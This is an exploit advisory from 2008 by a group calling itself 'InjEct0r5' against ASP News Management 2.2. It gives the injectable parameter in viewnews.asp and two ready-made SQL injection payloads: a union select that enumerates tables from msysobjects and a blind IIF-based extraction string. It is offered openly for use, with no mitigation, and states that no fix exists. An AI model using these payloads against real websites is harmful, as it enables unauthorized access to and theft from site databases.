Todd Woolums ASP News Management 2.2 SQL Injection Vulnerabiltiy

2008-06-10 00:00:00

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

[+] Script Name : AspNews Remote SQL Injection Exploit

|+| Team : InjEct0r5

[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;

--//-->

[+] Expl0iT :

/aspnews/viewnews.asp?newsID={SQL}

{SQL} --> 8+union+select+name+from+msysobjects

Or blind it :

{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00

--//-->

[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...

#

Fixes

No fixes

In order to submit a new fix you need to be registered.